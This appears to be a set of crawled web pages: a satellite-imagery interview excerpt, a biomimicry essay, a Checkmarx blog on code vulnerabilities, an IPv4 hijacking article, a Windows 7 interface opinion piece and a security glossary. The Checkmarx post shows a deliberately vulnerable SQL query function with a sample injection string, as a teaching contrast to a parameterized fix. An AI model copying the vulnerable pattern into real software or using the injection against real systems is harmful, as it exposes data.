resolution. So, neighborhood scale. Jared Serbu: And now, let’s focus on the long term for a second here. Now that we do have a decade’s worth of data, can you give us some examples of the sorts of insights you’ve been able to generate over that longer period? Eleanor Stokes: Sure, yeah, there’s a whole world of scientists that use this data. So I’m not the only one; we’re really the producers. And we try to get this out into the hands of scientists. But people have looked at things like light pollution, for example. And maybe more to the big data gaps that are out there: we have very little data about electricity reliability, like how often people have access to electricity. So this is one of the first chances we’re having to create a global dataset on electricity reliability. We’re working with the World Resources Institute to create this global data set, which will be used by utilities all across the globe who are trying to build out solar and other sorts of energy infrastructure for populations that need energy. Jared Serbu: Yeah, and I would imagine that reliability data is especially helpful in some underdeveloped areas where maybe the local utility is not so great at keeping track of the data itself. Eleanor Stokes: Exactly. And actually, most utilities don’t have that data, because it requires smart meters; you need, like, a two-way feedback from the homes that lose power to the utility’s central provider. So this is going to be helpful to utilities that haven’t been able to invest in that kind of high-tech technology. 
Jared Serbu: And thinking back on the history of Black Marble, were these sorts of uses what USRA and NASA had in mind when the project was first launched, or are people just kind of constantly discovering new use cases for it? Eleanor Stokes: No, it’s a great question. And the answer is absolutely not. The reason that Black Marble exists is really to image clouds, and for meteorological models. So weather drives that sensor and that satellite. So this is kind of a side benefit of having the sensor. But we’ve found, since having it in place, how useful it is for all of these other disciplines of science, and so now we’re trying to create the case to really have even more high-temporal-resolution nighttime images to understand these short-term things, like even traffic or migration patterns. Things that happen on a sub-daily basis, you can’t see. And right now, the sensor passes over at around 1 a.m. So we’re missing much of the human signal that you could potentially see at, like, say 9 p.m. So there’s definitely ways to improve our science around some of these questions. But so far, it hasn’t been the major priority that drives the launches. Jared Serbu: Yeah. Now that all these uses have been discovered, is there planning underway to launch something that’s actually purpose-built to gather this imagery, maybe at a higher resolution than we could have done in 2012? Eleanor Stokes: Yeah, you’re speaking to my dream. I think, I wouldn’t say plans, but I would say there’s lots of discussions, and a lot of the land science community has put out reasons why we need this. And I think NASA is sort of weighing all their different priorities. And ESA, the European Space Agency, is also considering launching a sort of nighttime sensor, as is DLR, which is the German space agency. So right now we’re like the only one that has a publicly available nighttime sensor for use at this high resolution. But certainly other countries and other regions will catch up.
<urn:uuid:6a313f10-b782-40f3-a34c-3a47e430b397>
CC-MAIN-2024-38
https://federalnewsnetwork.com/technology-main/2022/06/nighttime-satellite-images-may-shed-light-on-world-disasters-help-mitigate-risks/
2024-09-16T23:51:55Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651714.51/warc/CC-MAIN-20240916212424-20240917002424-00376.warc.gz
en
0.952673
2,009
3.109375
3
What is biomimicry? Biomimicry is a tool that can be used when seeking innovation. The concept is that nature has already solved many design problems through the process of evolution. Living things that are still extant have received bits and bytes of code in the form of genetic material, and when this information interfaces with the environment, sustainable life forms emerge. Animals, plants, viruses, and bacteria adapt by engineering themselves over the billions of years that life has existed on Earth. The Biomimicry Institute provides numerous examples. Neural networks mimic Nature’s system of a syncytium of nerves to create a mathematical system useful for solving nonlinear problems. Another example of biomimicry given by the Institute of the same name is that of the Murray effect, demonstrated in the veins of leaves and arteries of animals. Murray, an early 20th-century physiologist, described a formula for the radius of first and successive order branches to maximize conductance of fluid. Flow of fluid in the veins of leaves is important for transport of water, nutrients, and gases, so it is an obvious object of study. Leaf venation has evolved over time in response to environmental conditions. This is an example of the genetic code (bits & bytes) being transmitted selectively according to environmental pressure. Dicotyledon leaf venation has many closed loops that are able to carry fluid in the event of damage to other veins, including the central ones. This type of redundancy is built into retinal blood vessels, and it has been postulated that it might make for better water and electricity distribution networks, too. Could such a system of reticulating, interconnected, looping pathways build redundancy that allows digital systems to be more resistant to attack? Parenthetically, stomata along various pathways could open and close (like vacuum tubes, zeros and ones, ons and offs) in response to the amount of fluid in the environment. Could we use biomimicry to make digital systems better able to respond to fluctuations in demand? What are real world viruses? Viruses are packets of DNA or RNA and protein. They cannot live by themselves but must invade living cells, such as bacteria or animal cells, where they can take over those cells to reproduce. Viruses have a genetic code and can evolve just like single-celled or multicellular organisms can. Typically, viruses have a nucleic acid genome, a capsid, and an envelope. The capsid surrounds the DNA or RNA and is made of proteins that are, in fact, encoded by the virus’s genetic material. Some viruses have envelopes, which are bits of lipid taken from the host cell when the viruses are extruded. Although viruses have many characteristics of a living life form because they carry genetic material, can replicate, and undergo natural selection, they do not have a cell structure, which has been considered an important characteristic of life. They are somewhat like a disembodied bot. Virus particles, called virions, can spread to human cells through various vectors such as blood-sucking insects, the fecal-oral route, sexual contact, or airborne particles from sneezing. This is roughly analogous to a computer virus spreading through the internet or through a thumb drive or an unsuspecting host opening a malicious email. The body’s own immune response and antiviral medication are roughly analogous to cybersecurity. 
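To make the Murray relationship described above concrete, here is a minimal sketch, assuming the cubic form of Murray's law in which the cube of the parent radius equals the sum of the cubes of the daughter radii; the function names are ours, not part of the original discussion.

```python
# Minimal sketch of Murray's law: for a branching vessel or leaf vein, the cube
# of the parent radius equals the sum of the cubes of the daughter radii.
# Illustration only; the function names are hypothetical, not from the article.

def murray_parent_radius(daughter_radii):
    """Return the parent-branch radius implied by Murray's law."""
    return sum(r ** 3 for r in daughter_radii) ** (1.0 / 3.0)

def satisfies_murray(parent_radius, daughter_radii, tolerance=0.05):
    """Check whether a measured branch point is close to the Murray optimum."""
    expected = murray_parent_radius(daughter_radii)
    return abs(parent_radius - expected) / expected <= tolerance

if __name__ == "__main__":
    # Two equal daughter branches of radius 1.0 imply a parent radius of ~1.26.
    print(murray_parent_radius([1.0, 1.0]))     # ~1.2599
    print(satisfies_murray(1.26, [1.0, 1.0]))   # True
```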
The genetic code that animates viruses is carried on strands of DNA or RNA, which carry four types of nucleobases (guanine, cytosine, thymine, and adenine) that give cells the instructions they need to make proteins responsible for cell function. How they do this may provide important lessons for computer scientists. Moreover, microbiologists have much to learn from the computer lab. Computational biology may be a discrete enhancement to conventional thinking. It could be called a form of biomimicry when computer antibodies against computer viruses are induced. Digital ants can swarm to and isolate digital threats. What are computer viruses? When comparing computer and biological viruses, a computer virus is very similar to a flu virus in that it is designed to spread from host to host. The virus has the capability to replicate itself. Likewise, just as human viruses cannot reproduce without a host cell, computer viruses cannot reproduce and spread without a host mechanism such as a URL click, network access, or a file. Obviously, a computer virus isn’t like the flu in that it isn’t transmitted from computer to human and vice-versa. This kind of virus is a malicious program written to destroy, alter, compromise or steal data. Additionally, many viruses are written to spread from one computer host to another. These virus programs function by inserting or attaching themselves to a valid program or file. Biological viruses, such as influenza, are known to transform upon replication. When a virus performs this replication, it mutates itself. This behavior is very similar to the way some computer viruses work. So, while the headline asks “Are Computer Viruses a Form of Biomimicry?”, it could be argued that the answer is yes, especially with the advancement of military-grade malware from foreign governments using sophisticated algorithms and artificial intelligence. On the flip side of this discussion, biomimicry does study strategies used by nature to solve technological dilemmas facing us in the current times. Could biomimicry be used for both good and evil? The answer is yes. Several universities in the United States and abroad have been inventing ways that software will mimic biological immune systems. The software would screen a computer network for irregularities, then isolate the infectious computer virus and develop software in real time to fight it. If you think about it, this software will create a sort of computer “antibody”. Halt and catch fire (HCF), above and beyond referring to the television series of the same name, refers to code that will freeze a processor. This is clearly analogous to apoptosis, programmed cell death. A defect in the genetic code can prevent apoptosis (prevent HCF), and cells freed from programmed cell death become cancer cells. Essers, in an article in CIO magazine, discusses the potential convergence between computer and real-world viruses. He points out that there are already man-machine symbiotes (cyborgs), such as humans with permanent pacemakers. Clearly, with the advent of the internet of medical things, a digital virus could have a malicious effect on a permanent pacemaker. We believe that blockchain may be an important way of establishing the provenance of an instruction sent to a permanent pacemaker or other mission-critical device. The author points out that the HIV virus suppresses the host immune response and makes the host more vulnerable to attack by other foreign invaders. This is akin to a denial-of-service attack. 
Applying the principles of biomimicry, we feel that this is analogous to a defect in a mismatch repair gene as seen in Lynch type 1 and Lynch type 2 hereditary nonpolyposis colon cancer and familial cancer syndrome. Biomimicry is a powerful tool for engendering innovation in computer science, and it seems logical that computational biology can facilitate understanding of living organisms. It will be only a matter of time until we see the true potential of digital biomimicry.
<urn:uuid:6e8d3a24-bf56-42d8-88ed-ecb446bf2fef>
CC-MAIN-2024-38
https://coruzant.com/security/are-computer-viruses-a-form-of-biomimicry/
2024-09-19T10:26:11Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652028.28/warc/CC-MAIN-20240919093719-20240919123719-00176.warc.gz
en
0.945447
1,485
4.15625
4
Code Exposure: The Vulnerabilities in Your Code & Where They Originate Typical software applications are composed of two types of code: custom code created by your internal development teams, and third-party code – often open source – created outside the organization. Until about 10 to 15 years ago, almost all software was custom code, and every line of software was created and tested by in-house software teams. Third-party code from vendors, and in particular open-source software, wasn’t trusted. Regardless of the source, there are vulnerabilities in nearly every piece of code – which we at Checkmarx call code exposure. Software security solutions that include application security testing (AST) manage and measure your overall Software Exposure, which helps you accurately understand and significantly reduce your organization’s business risk. One component of software exposure is the concept of code exposure. This concept raises the question: “Have we identified critical vulnerabilities in our software – both custom code & open source?” What Are Vulnerabilities? Vulnerabilities are weaknesses in software that can often be exploited by threat actors. Most vulnerabilities occur during the design and coding phase of the Software Development Life Cycle (SDLC). These vulnerabilities are the result of several factors, including design errors, coding errors, and the use of open-source components with known vulnerabilities. Another significant contributing factor to developers introducing vulnerabilities is code complexity. Organizations with very large software applications typically do not have one person on staff who understands the entire code base, which can contribute to the propagation of security issues throughout a code base. Vulnerabilities Due to Coding Errors Software developers work from a specification describing what the software is intended to do (for example, when button A is pressed, display Account Information). Developers use functional requirements as the blueprint for their work. If a functional requirement doesn’t perform as specified, a functional “bug” is recorded. Security bugs or defects can occur when features aren’t implemented properly. For example, when button A is pressed, information on all accounts is displayed. Or the feature works, but it can be manipulated by threat actors to gain access to privileged information. Security must account for unforeseen misuse cases that cause the application to “break”, or otherwise perform in unintended ways. The security of software is usually not part of the functional specification, and just having a requirement that the software be “secure” doesn’t count. Software developers have traditionally been measured on a functional basis. If they delivered features on time, they were doing their jobs right. Security was never considered until about 20 years ago, and secure coding is still rarely taught in computer science programs. Lack of Focus on Security Leads to Code Exposure One source of code exposure is mistakes or weaknesses created by developers in custom software when they’re writing code. These weaknesses are often derived from poor coding behaviors, habits, and policies, or they are due to an ever-changing threat landscape or characteristics of various coding languages. Threat actors focus their efforts on finding these weaknesses and exploiting them, often to their financial benefit. 
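To ground the idea of a coding weakness that becomes exploitable, here is a small, hypothetical illustration of an injection flaw and its fix; the table, queries, and names are invented for the example rather than drawn from any Checkmarx product or customer code.

```python
import sqlite3

# Hypothetical illustration of a common coding error (SQL injection) and its fix.
# The table and variable names are invented for the example.

def find_user_vulnerable(conn, username):
    # Vulnerable: untrusted input is concatenated directly into the query,
    # so input like "x' OR '1'='1" changes the meaning of the statement.
    query = "SELECT id, name FROM users WHERE name = '" + username + "'"
    return conn.execute(query).fetchall()

def find_user_safe(conn, username):
    # Safer: a parameterized query keeps data separate from SQL code.
    return conn.execute(
        "SELECT id, name FROM users WHERE name = ?", (username,)
    ).fetchall()

if __name__ == "__main__":
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO users (name) VALUES ('alice'), ('bob')")
    print(find_user_safe(conn, "alice"))                 # only alice's row
    print(find_user_vulnerable(conn, "x' OR '1'='1"))    # returns every row
```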
The most common weaknesses (or software errors) are enumerated in the OWASP Top 10 and the SANS Top 25. Vulnerabilities from Third-Party Components The adoption of open-source components by software development teams dramatically changed the software industry. Instead of building all software “from scratch”, organizations use open-source components to provide common or repetitive features and functionalities. This limits the use of custom code to proprietary features and functionality. As a result, developers spend their time on key differentiators, rather than recreating common features. The adoption of open source by nearly all industries has fueled increases in open-source development. Many large organizations, such as Microsoft, have embraced open source, and millions of open-source projects are available for developers to both use and contribute to. Open-source software is still software, and it’s exposed to coding errors that can result in security vulnerabilities. Large numbers of newly discovered vulnerabilities are disclosed in open-source software every year. These vulnerabilities are typically reported in a responsible manner, accompanied by a patch or updated version that fixes the vulnerability, making remediation of vulnerable components relatively easy. Remediating Vulnerable Components It’s not always simple to remediate “the usage” of a vulnerable open-source component, however. First, you must have visibility into where open-source components are used. Unfortunately, many organizations don’t track their usage of open source – or they track it in a static, outdated spreadsheet. The average application includes hundreds of unique open-source components, and developers download and keep those components in their workspaces for years. As these components age, the chance that vulnerabilities have already been discovered and disclosed in them increases. With hundreds of poorly tracked components and lots of new vulnerabilities each year, many organizations are exposed to potential exploitation. Attackers are well aware that these open-source components are often poorly tracked and maintained. Identifying Code Exposure for Custom Code Fortunately, there are solutions that help identify code exposure. Start by analyzing the software your organization creates internally, and choose a complete application security testing solution that integrates with Continuous Integration (CI) servers as well as the developers’ integrated development environment (IDE). Static Application Security Testing (SAST) and Interactive Application Security Testing (IAST) solutions are a must-have. These solutions help you identify coding errors in custom code so you can find vulnerabilities early in the SDLC. It’s also important to configure your security solution to test for specific types of weaknesses or errors, such as those listed in the OWASP Top 10 or SANS Top 25. Of course, those aren’t the only vulnerabilities to worry about, so it’s helpful to be able to test more broadly in all cases. Identify Code Exposure in Third-Party Code Today, the average application is mostly open source. Software composition analysis demonstrates that today’s applications are composed of more than 80% open-source components within the code base. The adoption of Linux as an enterprise-class operating system, Java as a primary development language, and Apache Struts as an MVC framework has increased confidence in open-source components. 
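Given that the average application is now mostly open source, here is a minimal sketch of what tracking those components against known vulnerabilities can look like; the manifest entries and advisory data are invented for illustration, and a real software composition analysis tool would pull from curated vulnerability databases rather than a hard-coded dictionary.

```python
# Minimal sketch of open-source component tracking: compare the components an
# application uses against a list of known-vulnerable versions. The manifest and
# advisory entries below are invented for illustration.

# (component name, version) pairs pulled from a build manifest
manifest = [
    ("example-logging-lib", "2.14.0"),
    ("example-http-client", "4.5.13"),
]

# Known-vulnerable versions, keyed by component name (hypothetical data)
advisories = {
    "example-logging-lib": {
        "vulnerable_versions": {"2.14.0", "2.14.1"},
        "fixed_version": "2.17.1",
    },
}

def check_components(manifest, advisories):
    findings = []
    for name, version in manifest:
        advisory = advisories.get(name)
        if advisory and version in advisory["vulnerable_versions"]:
            findings.append(
                f"{name} {version} has a known vulnerability; "
                f"upgrade to {advisory['fixed_version']} or later"
            )
    return findings

for finding in check_components(manifest, advisories):
    print(finding)
```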
Since open-source components have become the building blocks for modern applications, identifying code exposure in third-party components has become an essential part of any software security program. You need a solution that mitigates code exposure from third-party components by scanning builds to identify all open-source components used. Look for solutions that provide a list of any publicly reported vulnerabilities in those components, accompanied by remediation advice for using updated versions or patches for those vulnerabilities. It’s essential that your software security solutions are integrated into build processes, then reviewed and acted upon with every build. Resolve Code Exposure Incorporate application security testing (AST) solutions throughout your SDLC to manage risks inherent to code exposure. Here are some key software security solutions that can help your team resolve code exposure: Static Application Security Testing What to look for: ability to automatically scan uncompiled/unbuilt code and identify security vulnerabilities in the most prevalent coding languages. Interactive Application Security Testing What to look for: ability to continuously monitor application behavior and find vulnerabilities that can only be detected on a running application. Open Source Analysis What to look for: ability to enforce open source analysis as part of the SDLC and manage open-source components while being able to ensure that vulnerable components are removed or replaced before they become a problem. Developer Software Security Education What to look for: an interactive, engaging software security training platform integrated into the development environment, sharpening the skills developers need to avoid security issues, fix vulnerabilities, and write secure code. Professional & Managed Services What to look for: a trusted team of advisors who can help development organizations transform their DevOps initiatives by adding security throughout their SDLC. With the information these software security solutions provide, your team can prioritize issues properly and resolve them in a timely manner. Unify your software security into a single, holistic platform to manage your software exposure. Learn how here.
<urn:uuid:5649eda3-2593-419e-b9fb-1f9cfa546776>
CC-MAIN-2024-38
https://checkmarx.com/blog/code-exposure-vulnerabilities-in-your-code/
2024-09-20T16:42:09Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701419169.94/warc/CC-MAIN-20240920154713-20240920184713-00076.warc.gz
en
0.942101
1,703
2.96875
3
Following the growing demand for internet commodities like IP assets, the prices of IPv4 addresses have reached new heights in recent times. Cybersecurity experts warn that this scenario could boost the risk of security threats as opportunistic cybercriminals might target unused or unsecured IP addresses to compromise them and trade on underground markets. Organizations that own or manage IPv4 address blocks should be vigilant and look out for any hijacking attempts on their IPv4 addresses by hackers. What is an IPv4 Address? IPv4, or IP version 4, is the fourth version of the Internet Protocol (IP), the set of rules governing the format of data communications sent over the internet and other networks. IPv4 addresses are 32-bit integers that are usually expressed in dotted-decimal notation (example: 192.0.2.146 is an IPv4 address). IPv4 and Associated Cyber Risks According to a report from IPXO, the price of an IPv4 address increased to $32 in Q1 2021 as the supply of IP resources failed to meet demand. It’s suspected that the increase in cyberattacks is a probable consequence of this price surge, as reselling hijacked IP addresses would be profitable in underground markets. The gap between the supply and demand of IP resources makes transactions expensive and exhausting, leading companies to engage in IPv4 black market transactions. Vincentas Grinius, CEO of IPXO, stated that increased prices and limited accessibility contribute to the rise of cybercrimes. “Cybercriminals can exploit these vulnerabilities in two ways: firstly, they target the IPv4 addresses of companies who do not feel pressured by IPv4 depletion, unaware of what is being done to their vast reserves of IP resources. Secondly, they offer desperate companies, willing to side-step legalities, the opportunity to obtain needed IPv4 addresses quickly but at prices equal and, in some cases, higher than in legal markets.” The report also claims that there are over 800 million unused IPv4 addresses at present, which could become a prime target for attackers to hijack and resell below the record-high market price. Some of the threats that affect IPv4 include: 1. Sniffing Attacks – A sniffing attack involves the illegal extraction of unencrypted data by capturing network traffic through packet sniffers. 2. Application Layer Attacks – An application layer attack targets computers by deliberately causing a fault in a computer’s operating system or applications. These include DDoS attacks, SQL injections, cross-site scripting, etc. 3. Flooding – Flooding results when a device is targeted with large amounts of network traffic, which could lead the network to become unavailable or out of service. 4. Rogue Devices – Rogue devices are unauthorized end-user computers or wireless access points that prey on sensitive information such as credit card numbers, passwords, and more. 5. Man-in-the-Middle Attacks – In a man-in-the-middle attack, the attacker inserts themselves into an ongoing communication or data transfer between an application/service and its user to spy on or impersonate someone. “Cybercriminals mainly capitalize on existing market problems, which the rapid price growth of IPv4 has demonstrated. By tapping into the vulnerabilities created by unequal resources, hijackers have created a lucrative black market. A possible solution to these issues is the creation of more sustainable internet governance. 
As IP leasing presents both a cost-efficient and accessible option for businesses, cybercriminals may be pushed out of the market by superior competition,” Grinius added.
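As a side note on the definition above, the relationship between the dotted-decimal form of an IPv4 address and the underlying 32-bit integer can be checked with Python's standard ipaddress module:

```python
import ipaddress

# The dotted-decimal form of an IPv4 address is just a human-readable rendering
# of a 32-bit integer; the standard ipaddress module makes the mapping explicit.
addr = ipaddress.IPv4Address("192.0.2.146")

print(int(addr))                           # 3221226130 -- the 32-bit integer
print(format(int(addr), "#010x"))          # 0xc0000292 -- same value in hex
print(ipaddress.IPv4Address(3221226130))   # 192.0.2.146 -- round trip back
```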
<urn:uuid:e34b8497-2291-4576-91b7-943ad1b78635>
CC-MAIN-2024-38
https://cisomag.com/hike-in-ipv4-prices-pose-severe-cybersecurity-threat/
2024-09-20T15:55:36Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701419169.94/warc/CC-MAIN-20240920154713-20240920184713-00076.warc.gz
en
0.945262
736
2.6875
3
Although everyone is talking about it, few seem to understand what all this means. Here’s what it means: After several decades, the death of the WIMP user interface is at hand. (WIMP stands for Windows, Icons, Menus and Pointing devices.) Windows 7 contains core user interface functionality that researchers have been working on since the 1980s. It’s exciting, and will radically change the way you use computers forever. Here are the three things you need to know about Windows 7. 1. Windows 7 represents a new category of user interface that has no name. I first told you about this new generation of user interface and Windows 7 back in December (I Want My MPC: The ‘Multi-Touch PC’ Era Dawns). In that article, I told you: “The major components of this UI are multi-touch (the ability of a touch screen to accept many points of input at once); physics (on-screen objects that behave as if they have weight, mass, momentum and other physical properties); and gestures (the ability to send commands to the system by drawing a shape on screen).” These user interface elements, plus hardware changes that I detail below, represent a huge leap in computer usage comparable to the leap from the command line to the graphical user interface (GUI). The Apple iPhone has a very rudimentary (but first-to-market) version of this new OS type. Microsoft’s proprietary vertical Surface PC has it, too. Apple will switch to this kind of OS as early as next year. Linux will, too. This is where all computer user interfaces are going. But what do we call this new category of OS? So far, few agree. Some call it a multi-touch user interface. But the OS is more about physics and gestures than multi-touch. I suspect multi-touch was heavily marketed by Apple because it was the single most unique feature of the Apple iPhone from a hardware perspective. So everyone picked up on the M word. But it’s an inaccurate – or, at least, incomplete — descriptor for the new UI. I’d like to propose that we call this new kind of UI the MPG interface, for “Multi-touch, Physics and Gestures.” (Just throwing this against the wall here to see if it sticks.) I’ll refer to it as such for the rest of this article. 2. Pundits will bitch and moan about MPG, but later eat their words. In the early 1980s, the conventional wisdom was that DOS’s command line interface was faster, cleaner and generally better than that new-fangled, funky, slow “GUI” user interface of OS/2, Windows and others. All that was forgotten by the early 1990s, when everyone moved to GUI interfaces. A similar thing is happening today with the MPG idea. Blogger and Microsoft expert Mary Jo Foley writes: “I am still a non-believer. Do you want touch on your Windows notebook? I, for one, do not.” Henry Blodget wrote on the Silicon Valley Insider blog that “We never touch our PC screen, and we hate it when other people touch our PC screens. This will not change if Windows 7.” They’ll change their tunes, believe me. The reason is that reaching out and touching things is what comes naturally to humans. The mouse is a temporary interim device between typing commands via a command line interface and reaching out and directly manipulating objects on screen via the MPG interface. The whole history of user interfaces has always been about making the ever-increasing computer power that results from Moore’s Law work harder to make what’s on screen look and behave like real-world physical objects. Look at how video games have evolved toward increasing realism. We crave it. 
There will be many, many critics of the whole MPG approach. They’ll all eat their words. 3. The new generation of MPG OSs will kill off mice and keyboards. There will always be variety in PCs. But each generation of UI has its natural form-factor. For the WIMP UI, the standard desktop PC has involved a screen, keyboard and mouse on the desk, with a separate CPU nearby. The natural form factor for Windows 7 and the other MPG operating systems will look like a drafting table. The mouse and keyboard will go away, and the “CPU” electronics will be built into the back of a giant screen between 30 and 60 inches. It will pivot at the center of the left and right edges. It will tilt vertical for TV and presentations, and horizontal for “desk mode” where you can lay your physical books and papers right next to your electronic ones. Generally, however, you’ll use it in drafting table mode with the bottom of the screen at about waist high and the top of the screen at about head height when you’re in your chair. You’ll use both hands to grab, re-size, move, copy and interact with documents and other objects on-screen. When you want to write something, you’ll do the keyboard gesture to bring up an on-screen keyboard, and just type away. The natural MPG form factor for mobile computers will be a clamshell design with a screen on both sides (one where the screen is located on mobile computers today, plus another screen where the keyboard is now). It will snap flat to form a huge single screen with a kind of “kickstand” to put it at an angle, or you can use it in writing mode and have an on-screen keyboard and touchpad on the bottom and your documents on the top (like today’s laptops, but with virtual keyboard and touchpad). Microsoft’s demo included a standard laptop, with all the touching going on awkwardly on the standard screen. But future MPG-specific laptops will have touching going on full screen, or mainly the bottom half when used in clamshell mode. Optional physical keyboards will pop out of both desktop and mobile systems, or connect via Bluetooth. They’ll be there for purists, old people and others who don’t like the virtual, on-screen keyboards. But the mouse will be gone forever. Windows 7 might be great, or it might be another dog like Windows Vista. But mark my words, the next couple of years will usher in the next generation of user interface from Microsoft, Apple and the Linux community, and it’s going to be really, really cool.
<urn:uuid:4212438c-fa5c-42f7-9ce2-490f82b60f50>
CC-MAIN-2024-38
https://www.datamation.com/trends/the-three-things-you-need-to-know-about-windows-7/
2024-09-20T18:26:23Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701419169.94/warc/CC-MAIN-20240920154713-20240920184713-00076.warc.gz
en
0.944269
1,381
2.71875
3
Let’s do a show of hands — who loves jargon? Anyone? I didn’t think so. Face it, aside from trivia champions, jargon doesn’t make life any easier for us. If you’re attending your first security conference this year, you might feel like you need an interpreter to make sense of the technical terminology and acronyms you’ll find around every corner. At Cisco Umbrella, we’re fluent in cybersecurity – and we want to help you make sense of the often-confusing security landscape! In this post, we define key cybersecurity terms that everyone should know in 2020 — and beyond. Part 1: Threats Backdoor: A backdoor is an access point designed to allow quick and undetected entrance to a program or system, usually for malicious purposes. A backdoor can be installed by an attacker using a known security vulnerability, and then used later to gain unfettered access to a system. Botnet: “Botnet” is a portmanteau of “robot network.” It’s a collection of infected machines that can be used for any number of questionable activities, from cryptomining to DDoS attacks to automated spam comments on blogs. Command-and-control (C2) attacks: Command-and-control attacks are especially dangerous because they are launched from inside your network. Security technologies like firewalls are designed to recognize and stop malicious activity or files from entering your network. However, a command-and-control attack is trickier than a standard threat. A file doesn’t start out showing any malicious behavior, so it is deemed harmless by your firewall and permitted to enter your network. Once inside, the file stays dormant for a set period of time or until it is triggered remotely. Then, the file reaches out to a malicious domain and downloads harmful data, infecting your network. Denial of Service (DoS) Attack: This type of attack consumes all of the resources of a target so that it can no longer be used or reached, effectively taking it down. DoS attacks are designed to take a website or server offline, whether for monetary, political, or other reasons. A DDoS, or Distributed Denial of Service attack, is a subcategory of DoS attack that is carried out using two or more hosts, often via a botnet. Drive-by download: A drive-by download installs malware invisibly in the background when the user visits a malicious webpage, without the user’s knowledge or consent. Often, drive-by downloads take advantage of browser or browser plug-in vulnerabilities that accept a download under the assumption that it’s a benign activity. Using an up-to-date secure browser can help protect you against this type of attack. Exploit: An exploit is any attack that takes advantage of a weakness in your system. It can make use of software, bits of data, and even social engineering (like pretending to be someone from your IT team who needs your password to perform a security update). To minimize exploits, it’s important to keep your software up-to-date and to be aware of social engineering techniques (see below). Malware: Malware is a generic term for any program installed on a system with the intent to corrupt, damage, or disable that system. Razy, TeslaCrypt, NotPetya, and Emotet are a few recent examples. - Cryptomining malware: Cryptomining by itself is not necessarily malicious — many people mine cryptocurrency on their own systems. Malicious cryptomining, however, is a browser- or software-based threat that enables bad actors to hijack system resources to generate cryptocurrencies. 
Cryptomining malware is an easy way for bad actors to generate cash while remaining anonymous and without having to use their own resources. Learn more about the cryptomining malware threat. - Ransomware: Ransomware is malware used to encrypt a victim’s data with an encryption key that is known only to the attacker. The data becomes unusable until the victim pays a ransom to decrypt the data (usually in cryptocurrency). Ransomware is a fast-growing and serious threat — learn more in our newly updated guide to ransomware defense. - Rootkits: A rootkit is a malicious piece of code that hides itself in your system, prevents detection, and enables bad actors to gain continued access to your system. If attackers gain full access to your system once, they can use rootkits to continue that access over a long period of time. - Spyware: Malicious code that gathers information about you and your browsing habits, and then sends that information to a third party. - Trojans: A trojan is a seemingly innocuous program that acts as a front for malicious code hiding inside. Trojans can do any number of things, from stealing data to allowing remote system control. These programs take their name from the famous Grecian “Trojan Horse” that took advantage of a similar vulnerability. - Viruses: Often used as a blanket term, a virus is a piece of code that attaches itself to files, such as email attachments or files you download online. Once it infects your system, it can cause all kinds of problems, whether that means deleting system files or corrupting your data. Computer viruses also replicate and spread across networks – just like viruses in the physical world. - Worms: A worm is a type of malware that clones itself in order to spread to other computers, performing various damaging actions on whatever system it infects. Unlike a virus, a worm exists as a standalone entity — it isn’t hidden inside something else like an attachment. MitM or Man-in-the-Middle Attack: A MitM attack is pretty much what it sounds like. An attacker will intercept, relay, and potentially change messages between two parties without their knowledge. MitM can be used to break encryption, compromise account details, or gain access to systems by impersonating a user. Phishing: Phishing is a technique that mimics a legitimate communication (like an email from your online bank) to steal sensitive information. Like fishermen with a lure, attackers will attempt to take your personal information by using fake emails, forms, and web pages to coax you to provide it to them. - Spear phishing is a form of phishing that targets one specific individual by using publicly accessible data about them, like from a business card or social media profile. - Whale phishing goes one step further than spear phishing and describes a targeted attack on a high-ranking individual, like a CEO or government official. Social engineering: A general term for any activity in which an attacker is trying to manipulate you into revealing information, whether over email, phone, web forms, or social media platforms. Passwords, account credentials, social security numbers — we often don’t think twice about giving this information away to someone we can trust, but who’s really on the other end of the line? Protect yourself, and think twice before sharing. It’s always OK to verify the request for information in another way, like calling an official customer support number. 
Zero-day (0day): A zero day attack is when a bad actor exploits a new, previously unknown software vulnerability for which there is no patch. It’s a constant struggle to stay ahead of attackers, but you don’t have to do it alone — you can get help from the security experts at Cisco Talos. Part 2: Solutions Anti-malware: Anti-malware software is a broad category of software designed to block, root out, and destroy viruses, worms, and other nasty things that are described in this list. These products need to be updated regularly to ensure that they remain effective against new threats. They can be deployed at various points in the network chain (email, endpoint, data center, cloud) and either on-premises or delivered from the cloud. Cloud access security broker (CASB): This is software that provides the ability to detect and report on the cloud applications that are in use across your environment. It provides visibility into cloud apps in use as well as their risk profiles, and the ability to block/allow specific apps. Read more about securing cloud apps here. Cloud security: This is a subcategory of information security and network security. It is a broad term that can include security policies, technologies, applications, and controls that are used to protect sensitive company and user data wherever it is exposed in a public, private, or hybrid cloud environment. DNS-layer security: This is the first line of defense against threats because DNS resolution is the first step in establishing a connection to the internet. It blocks requests to malicious and unwanted destinations before a connection is even established — stopping threats over any port or protocol before they reach your network or endpoints. Learn more about DNS-layer security here. Email security: This refers to the technologies, policies, and practices used to secure the access and content of email messages within an organization. Many attacks are launched via email messages, whether through targeted attacks (see note on phishing above) or malicious attachments or links. A robust email security solution protects you from attacks whether email is in transit across your network or when it is on a user’s device. Encryption: This is the process of scrambling messages so that they cannot be read until they are decrypted by the intended recipient. There are several types of encryption, and it’s an important component of a robust security strategy. Endpoint security: if DNS-layer security is the first line of defense against threats, then you might think of endpoint security as the last line of defense! Endpoints can include desktop computers, laptop computers, tablets, mobile phones, desk phones, and even wearable devices — anything with a network address is a potential attack path. Endpoint security software can be deployed on an endpoint to protect against file-based, fileless, and other types of malware with threat detection, prevention, and remediation capabilities. Firewall: Imagine all the nasty, malicious stuff on the Internet without anything to stop it. A firewall stands between your trusted entities and whatever lies beyond, controlling access based on security rules. A firewall can be hardware or software, a standalone security appliance or a cloud-delivered solution. Next-generation firewall (NGFW): This is the industry’s new solution for an evolved firewall. 
